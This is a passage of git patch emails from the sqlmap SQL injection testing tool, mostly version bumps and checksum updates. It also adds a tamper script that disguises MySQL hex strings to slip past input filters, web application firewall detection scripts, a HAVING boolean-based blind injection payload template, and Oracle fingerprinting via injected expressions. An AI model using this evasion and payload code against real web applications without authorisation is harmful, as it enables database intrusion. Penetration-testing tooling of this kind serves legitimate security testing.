0eb60e630a3..931e8becf57 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -386,7 +386,7 @@ def processResponse(page, responseHeaders, status=None): continue conf.paramDict[PLACE.POST][name] = value - conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST]) + conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST]) if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): kb.browserVerification = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fd8bcc9e5bd..24ec8962fb3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2c8a4dcbdeec825ded4f27bd727379e5 lib/core/settings.py +dbf72e4b82773ade88cc34a53f80abcb lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -7a779e6bdf582b8ceb6d640cf869ac10 lib/request/basic.py +62e4500ef19f7795a1443897b535b36d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From 694b5bb5c028c7e7d38b1c94f8788036b54dd737 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 30 May 2018 15:48:16 +0200 Subject: [PATCH 149/428] New tamper script (per user request) --- lib/core/settings.py | 2 +- tamper/0x2char.py | 42 ++++++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 3 ++- 3 files changed, 45 insertions(+), 2 deletions(-) create mode 100644 tamper/0x2char.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 65c3e8f975c..624222b0750 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.23" +VERSION = "1.2.5.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/0x2char.py b/tamper/0x2char.py new file mode 100644 index 00000000000..f08a434e59c --- /dev/null +++ b/tamper/0x2char.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + + Tested against: + * MySQL 4, 5.0 and 5.5 + + Notes: + * Useful in cases when web application does the upper casing + + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): + if len(match.group(1)) > 2: + result = "CONCAT(%s)" % ','.join("CHAR(%d)" % ord(_) for _ in match.group(1).decode("hex")) + else: + result = "CHAR(%d)" % ord(match.group(1).decode("hex")) + retVal = retVal.replace(match.group(0), result) + + return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 24ec8962fb3..aa08dc70748 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dbf72e4b82773ade88cc34a53f80abcb lib/core/settings.py +dcdc0a7179010067fdbf8ad1fa9ab09e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -226,6 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py 5c8583dd47f92935ceb41210a10eeebf sqlmap.py +b2c2cc55ba4e31bea94494dcafe5d8cc tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From e7d448c56c228d084b131815ff74492a80da2695 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 1 Jun 2018 10:21:59 +0200 Subject: [PATCH 150/428] Minor update regarding #3129 --- lib/core/settings.py | 2 +- lib/parse/html.py | 4 +++- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 624222b0750..3393569f94c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.24" +VERSION = "1.2.6.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/html.py b/lib/parse/html.py index c80bc3599b5..a7eb7d7ca63 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -9,6 +9,7 @@ from xml.sax.handler import ContentHandler +from lib.core.common import urldecode from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths @@ -26,6 +27,7 @@ def __init__(self, page): self._dbms = None self._page = (page or "") self._lower_page = self._page.lower() + self._urldecoded_page = urldecode(self._page) self.dbms = None @@ -47,7 +49,7 @@ def startElement(self, name, attrs): keywords = sorted(keywords, key=len) kb.cache.regex[regexp] = keywords[-1].lower() - if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I): + if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._urldecoded_page, re.I): self.dbms = self._dbms self._markAsErrorPage() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa08dc70748..e5d8636a3d8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dcdc0a7179010067fdbf8ad1fa9ab09e lib/core/settings.py +cd402ab35a20d44b7404bcc18f652a16 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -62,7 +62,7 @@ e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py -33f21b11b7963062df8fa2292229df80 lib/parse/html.py +1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py From c1825b2651098166579b0393b683ecde354e58c2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 1 Jun 2018 11:23:41 +0200 Subject: [PATCH 151/428] Patch for #3130 --- lib/core/settings.py | 2 +- lib/core/update.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3393569f94c..1dabb6fed40 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.0" +VERSION = "1.2.6.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index af939aa6c80..ce5f87e4811 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -49,6 +49,7 @@ def update(): errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) logger.error(errMsg) else: + attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode for wildcard in ('*', ".*"): for _ in glob.glob(os.path.join(directory, wildcard)): try: @@ -83,6 +84,8 @@ def update(): else: if not success: logger.error("update could not be completed") + else: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e5d8636a3d8..c473dace712 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,14 +47,14 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -cd402ab35a20d44b7404bcc18f652a16 lib/core/settings.py +993fd299707fdb019bfe4e12967da74c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py +c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 5381d4d5bea9e4307be3cc21fa5c46109f83955f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 4 Jun 2018 23:33:07 +0200 Subject: [PATCH 152/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/anquanbao.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1dabb6fed40..308baf55fe5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.1" +VERSION = "1.2.6.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c473dace712..3cabca07bbc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -993fd299707fdb019bfe4e12967da74c lib/core/settings.py +240e554483cc86de3fc483858dc8cb7b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -390,7 +390,7 @@ ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqlud 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py 667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py -003cc986b2f5899fe3c85b6309c4b556 waf/anquanbao.py +7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py dec64f18c23962d279cc1cde6469afed waf/asm.py 6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py diff --git a/waf/anquanbao.py b/waf/anquanbao.py index 4aacfab521a..42f608c7bae 100644 --- a/waf/anquanbao.py +++ b/waf/anquanbao.py @@ -17,7 +17,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) retval = re.search(r"MISS", headers.get("X-Powered-By-Anquanbao", ""), re.I) is not None - retval |= code == 405 and "/aqb_cc/error/" in (page or "") + retval |= code == 405 and any(_ in (page or "") for _ in ("/aqb_cc/error/", "hidden_intercept_time")) if retval: break From ed37ae1562a2b2223d1d66ada646e2dc8ef5097d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:05:17 +0200 Subject: [PATCH 153/428] Adding new WAF script (Cloudbric) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/cloudbric.py | 22 ++++++++++++++++++++++ 3 files changed, 25 insertions(+), 2 deletions(-) create mode 100644 waf/cloudbric.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 308baf55fe5..4ee5deada13 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.2" +VERSION = "1.2.6.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3cabca07bbc..687e2db099c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -240e554483cc86de3fc483858dc8cb7b lib/core/settings.py +8dc42e1cb53bbbac2172f1edd5077597 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -400,6 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py +e70fbe03e1338f3d3a412136b033e3d6 waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py new file mode 100644 index 00000000000..df84c67c842 --- /dev/null +++ b/waf/cloudbric.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "Cloudbric WAF (Cloudbric)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = code >= 400 and all(_ in (page or "") for _ in ("Cloudbric", "Malicious Code Detected")) + + return retval From a399b6503328e8cab7608a1e9fd3e6a6134ca403 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:20:37 +0200 Subject: [PATCH 154/428] Trivial update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- waf/cloudbric.py | 2 +- waf/edgecast.py | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4ee5deada13..52ca5b42e1b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.3" +VERSION = "1.2.6.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 687e2db099c..30153c9dd31 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8dc42e1cb53bbbac2172f1edd5077597 lib/core/settings.py +9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -400,7 +400,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -e70fbe03e1338f3d3a412136b033e3d6 waf/cloudbric.py +cf979f0393523c028d8190ef6116884f waf/cloudbric.py 21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py @@ -408,7 +408,7 @@ ac96f34c254951d301973617064eb1b5 waf/comodo.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py 357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py -ad20145a12cff50d49085ed06c8e422b waf/edgecast.py +7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py 954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py eb56ac34775cc3c5f721ec967d04b283 waf/generic.py diff --git a/waf/cloudbric.py b/waf/cloudbric.py index df84c67c842..bbe79e5d810 100644 --- a/waf/cloudbric.py +++ b/waf/cloudbric.py @@ -10,7 +10,7 @@ from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "Cloudbric WAF (Cloudbric)" +__product__ = "Cloudbric Web Application Firewall (Cloudbric)" def detect(get_page): retval = False diff --git a/waf/edgecast.py b/waf/edgecast.py index 92db2f789c6..ad789b0793f 100644 --- a/waf/edgecast.py +++ b/waf/edgecast.py @@ -10,7 +10,7 @@ from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "EdgeCast WAF (Verizon)" +__product__ = "EdgeCast Web Application Firewall (Verizon)" def detect(get_page): retval = False From 25369ca5919b6934b10de62703460dd069396578 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 00:59:47 +0200 Subject: [PATCH 155/428] Adding new payload (HAVING boolean-based blind) --- lib/core/settings.py | 2 +- plugins/dbms/oracle/fingerprint.py | 10 +++++----- txt/checksum.md5 | 6 +++--- xml/payloads/boolean_blind.xml | 17 +++++++++++++++++ 4 files changed, 26 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 52ca5b42e1b..e86a644a818 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.4" +VERSION = "1.2.6.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 2d4f46369f1..22a8a6968e5 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -68,23 +68,23 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting - # directly to the Oracle database + # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM") + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if result: infoMsg = "confirming %s" % DBMS.ORACLE logger.info(infoMsg) - # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does + # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does # not work connecting directly to the Oracle database if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") + result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30153c9dd31..28219c3b1da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9d0f7b5da86733268cf0ee3bcce3fd0e lib/core/settings.py +ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -177,7 +177,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py +538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py 9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py 5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py @@ -467,7 +467,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml +3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 114097cf79d..ecf19cf8a19 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -1361,6 +1361,23 @@ Tag: SAP MaxDB + + + + HAVING boolean-based blind - WHERE, GROUP BY clause + 1 + 3 + 1 + 1,2 + 1 + HAVING [INFERENCE] + + HAVING [RANDNUM]=[RANDNUM] + + + HAVING [RANDNUM]=[RANDNUM1] + + From c89f119e1afcb08431d1d85b674df39e33778556 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 5 Jun 2018 01:12:50 +0200 Subject: [PATCH 156/428] Minor update --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/varnish.py | 1 + 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e86a644a818..221c9142346 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.5" +VERSION = "1.2.6.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 28219c3b1da..3ec7ad935e1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ea76ddec1c3e65b63c217aaaf6e15e3c lib/core/settings.py +def1ed8934e08b37d5e6455554cb2be8 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -444,7 +444,7 @@ dffa9cebad777308714aaf83b71635b4 waf/teros.py b37210459a13de40bf07722c4d032c33 waf/trafficshield.py fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py a687449cd4e45f69e33b13d41e021480 waf/uspses.py -814fcc4ab087fb181ddad5fc12bd3d53 waf/varnish.py +f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py 20840afc269920826deac2b6c00d6b9c waf/wallarm.py 11205abf397ae9072adc3234b656ade9 waf/watchguard.py 9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py diff --git a/waf/varnish.py b/waf/varnish.py index 3075866336b..a1384d6eac2 100644 --- a/waf/varnish.py +++ b/waf/varnish.py @@ -21,6 +21,7 @@ def detect(get_page): retval |= re.search(r"varnish\Z", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None retval |= re.search(r"varnish", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None retval |= code == 404 and re.search(r"\bXID: \d+", page or "") is not None + retval |= code >= 400 and "Request rejected by xVarnish-WAF" in (page or "") if retval: break From 86303bde5526d464973b252ef43a5c4259819024 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:24:29 +0200 Subject: [PATCH 157/428] Trivial update (wording) --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 4 ++-- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 221c9142346..2bea0c6ba05 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.6" +VERSION = "1.2.6.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 